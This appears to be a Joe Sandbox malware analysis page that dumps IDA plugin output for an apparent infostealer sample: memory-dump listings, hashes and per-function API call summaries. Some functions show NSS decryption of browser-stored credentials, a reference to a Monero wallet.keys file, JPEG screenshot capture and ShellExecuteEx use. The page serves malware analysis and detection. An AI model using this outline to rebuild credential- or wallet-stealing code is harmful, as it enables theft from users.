Associated: 00000000.00000002.1992251783.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000045B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000004E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000050B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000058A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000720000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.00000000007FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000822000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.000000000082B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000839000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992935085.000000000083A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1993049412.00000000009D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1993067307.00000000009D3000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0caeee11c2f2603a49e62a8d8dc1f879a2b7126f2e43782e7fcafd72903f4231
Instruction ID: d3a817e3f89d1e52bb8ded1ec32a1dfbb7bc874b0520f7f89471b9be63ab6265
Opcode Fuzzy Hash: 0caeee11c2f2603a49e62a8d8dc1f879a2b7126f2e43782e7fcafd72903f4231
Instruction Fuzzy Hash: C25123F3F086008BF3046E29EC857BAB7D6EBD4310F1B453DDA8997784E93A48058786

Function 00617AE4 Relevance: .2, Instructions: 160COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1992701256.000000000059E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1992232508.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.0000000000341000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000039A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000045B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000004E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000050B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000058A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000720000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.00000000007FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000822000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.000000000082B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000839000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992935085.000000000083A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1993049412.00000000009D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1993067307.00000000009D3000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7cb12f4404d1f78bde0d8459ac6803edf8f59723a5fa2ab9839253c0941fcce9
Instruction ID: e2c8550dafb8a37a37222ac166c28f1051d17970fe7d7e224f28997264f27d03
Opcode Fuzzy Hash: 7cb12f4404d1f78bde0d8459ac6803edf8f59723a5fa2ab9839253c0941fcce9
Instruction Fuzzy Hash: A5412CF3A186045BE314AE3CDC8572AB7D5EB94320F1A863DEA85C7384E93998018792

Function 009D21DB Relevance: .2, Instructions: 154COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1993049412.00000000009D2000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1992232508.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.0000000000341000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000039A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000045B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000004E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000050B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000058A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000720000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.00000000007FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000822000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.000000000082B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000839000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992935085.000000000083A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1993067307.00000000009D3000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: acfd8fd4cddda31ce3cd6e8039d3ea8e759522a4414db15a9a3deb5af23164c8
Instruction ID: 01df7ab2d453131f62af7f71e14e5b373aaca45ab846054327c87d04caee8230
Opcode Fuzzy Hash: acfd8fd4cddda31ce3cd6e8039d3ea8e759522a4414db15a9a3deb5af23164c8
Instruction Fuzzy Hash: 43516DF3A087009FE7146E19ECC176AFBE5FF98324F16492DE6C887780E67558408A97

Function 00696CD4 Relevance: .1, Instructions: 116COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1992701256.000000000059E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1992232508.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.0000000000341000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000039A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000045B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000004E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000050B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000058A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000720000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.00000000007FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000822000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.000000000082B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000839000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992935085.000000000083A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1993049412.00000000009D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1993067307.00000000009D3000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cdc5f50e8cc5f277e049b68ed1beb3bf2c51449b8d77fd21605fea596dca7fd3
Instruction ID: f4e79003e66b65075ff9ab9ab943fbf299e833d7378d9aee4275849af1573928
Opcode Fuzzy Hash: cdc5f50e8cc5f277e049b68ed1beb3bf2c51449b8d77fd21605fea596dca7fd3
Instruction Fuzzy Hash: 753139F391C2109BE300FA29EC857AAB7D5EB94310F16853DEAD493744FA3A980542C3

Function 00359750 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1992251783.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1992232508.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000039A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000045B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000004E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000050B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000058A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000720000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.00000000007FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000822000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.000000000082B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000839000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992935085.000000000083A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1993049412.00000000009D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1993067307.00000000009D3000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90

Function 0034C990 Relevance: 28.4, APIs: 15, Strings: 1, Instructions: 384filestringCOMMON

Download Yara Rule

APIs

NSS_Init.NSS3(00000000), ref: 0034C9A5

Part of subcall function 0035A740: lstrcpy.KERNEL32(00360E17,00000000), ref: 0035A788

Part of subcall function 0035A920: lstrcpy.KERNEL32(00000000,?), ref: 0035A972
Part of subcall function 0035A920: lstrcat.KERNEL32(00000000), ref: 0035A982

Part of subcall function 0035A8A0: lstrcpy.KERNEL32(?,00360E17), ref: 0035A905

Part of subcall function 0035A9B0: lstrlen.KERNEL32(?,01279050,?,\Monero\wallet.keys,00360E17), ref: 0035A9C5
Part of subcall function 0035A9B0: lstrcpy.KERNEL32(00000000), ref: 0035AA04
Part of subcall function 0035A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0035AA12

CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,0127CE80,00000000,?,0036144C,00000000,?,?), ref: 0034CA6C
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0034CA89
GetFileSize.KERNEL32(00000000,00000000), ref: 0034CA95
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 0034CAA8
ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0034CAD9
StrStrA.SHLWAPI(?,0127CF70,00360B52), ref: 0034CAF7
StrStrA.SHLWAPI(00000000,0127D030), ref: 0034CB1E
StrStrA.SHLWAPI(?,0127D9F0,00000000,?,00361458,00000000,?,00000000,00000000,?,01278F10,00000000,?,00361454,00000000,?), ref: 0034CCA2
StrStrA.SHLWAPI(00000000,0127DC30), ref: 0034CCB9

Part of subcall function 0034C820: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 0034C871
Part of subcall function 0034C820: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0034C87C
Part of subcall function 0034C820: PK11_GetInternalKeySlot.NSS3 ref: 0034C88A
Part of subcall function 0034C820: PK11_Authenticate.NSS3(00000000,00000001,00000000), ref: 0034C8A5
Part of subcall function 0034C820: PK11SDR_Decrypt.NSS3(?,?,00000000), ref: 0034C8EB
Part of subcall function 0034C820: PK11_FreeSlot.NSS3(?), ref: 0034C961

StrStrA.SHLWAPI(?,0127DC30,00000000,?,0036145C,00000000,?,00000000,01278F60), ref: 0034CD5A
StrStrA.SHLWAPI(00000000,01279140), ref: 0034CD71

Part of subcall function 0034C820: lstrcat.KERNEL32(?,00360B46), ref: 0034C943
Part of subcall function 0034C820: lstrcat.KERNEL32(?,00360B47), ref: 0034C957
Part of subcall function 0034C820: lstrcat.KERNEL32(?,00360B4E), ref: 0034C978

lstrlen.KERNEL32(00000000), ref: 0034CE44
CloseHandle.KERNEL32(00000000), ref: 0034CE9C
NSS_Shutdown.NSS3 ref: 0034CEAA

Strings

, xrefs: 0034C9C6

Memory Dump Source

Source File: 00000000.00000002.1992251783.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1992232508.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000039A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000045B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000004E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000050B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000058A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000720000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.00000000007FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000822000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.000000000082B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000839000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992935085.000000000083A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1993049412.00000000009D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1993067307.00000000009D3000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_file.jbxd

Yara matches

Similarity

API ID: Filelstrcat$lstrcpy$K11_lstrlen$PointerSlot$AuthenticateBinaryCloseCreateCryptDecryptFreeHandleInitInternalReadShutdownSizeString
String ID:
API String ID: 1052888304-3916222277
Opcode ID: 369bb16a35d91ef48546b57c5d6f4c9c91cb1779e0cc4e3e26ba16b7bb198aed
Instruction ID: 78869cfef26208ae8beba1c1cf30f449c263a22489987602f966919f9a5a9575
Opcode Fuzzy Hash: 369bb16a35d91ef48546b57c5d6f4c9c91cb1779e0cc4e3e26ba16b7bb198aed
Instruction Fuzzy Hash: 47E1F271910508ABDB16EBA0DC95FEEB778BF14301F404259F9067B1A1EF306A4EEB61

Function 00359010 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 184COMMON

Download Yara Rule

APIs

CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 0035906C

Strings

image/jpeg, xrefs: 00359136

Memory Dump Source

Source File: 00000000.00000002.1992251783.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1992232508.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000039A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000045B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000004E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000050B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000058A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000720000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.00000000007FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000822000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.000000000082B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000839000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992935085.000000000083A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1993049412.00000000009D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1993067307.00000000009D3000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_file.jbxd

Yara matches

Similarity

API ID: CreateGlobalStream
String ID: image/jpeg
API String ID: 2244384528-3785015651
Opcode ID: 5b77668bbb29e6edd0cc516e18cdadf9bf5451f2d5cd5ab316dec7dee1b47288
Instruction ID: 00c54de52472c1af8619b29a67ec44cc24e5eb1e9bf51613a645cfcb687d5a5e
Opcode Fuzzy Hash: 5b77668bbb29e6edd0cc516e18cdadf9bf5451f2d5cd5ab316dec7dee1b47288
Instruction Fuzzy Hash: 2D71DC71910208EBDB04DFE4DC89FEEB7B8BB58701F108509F915AB294DB34A949DB61

Function 003517A0 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 162COMMON

Download Yara Rule

APIs

StrCmpCA.SHLWAPI(00000000,block), ref: 003517C5
ExitProcess.KERNEL32 ref: 003517D1

Strings

block, xrefs: 003517B7

Memory Dump Source

Source File: 00000000.00000002.1992251783.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1992232508.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000039A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000045B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000004E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000050B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000058A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000720000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.00000000007FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000822000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.000000000082B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000839000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992935085.000000000083A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1993049412.00000000009D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1993067307.00000000009D3000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_file.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID: block
API String ID: 621844428-2199623458
Opcode ID: 21ae9c8b0a95b7a1eb6dc7528c8b81a1563d044a0ae6914f49995d9027d01b20
Instruction ID: bcc09ea88ef5b251fc9d1d340ec80e63988f740dc8ce614486ee29b7f4ffad46
Opcode Fuzzy Hash: 21ae9c8b0a95b7a1eb6dc7528c8b81a1563d044a0ae6914f49995d9027d01b20
Instruction Fuzzy Hash: A4517DB4A00209EFDB06DFA0C955FBE77B9BF44305F108149EC06AB260D770E949DBA2

Function 00352E30 Relevance: 19.7, APIs: 3, Strings: 8, Instructions: 469COMMON

Download Yara Rule

APIs

Part of subcall function 0035A740: lstrcpy.KERNEL32(00360E17,00000000), ref: 0035A788

ShellExecuteEx.SHELL32(0000003C), ref: 003531C5
ShellExecuteEx.SHELL32(0000003C), ref: 0035335D
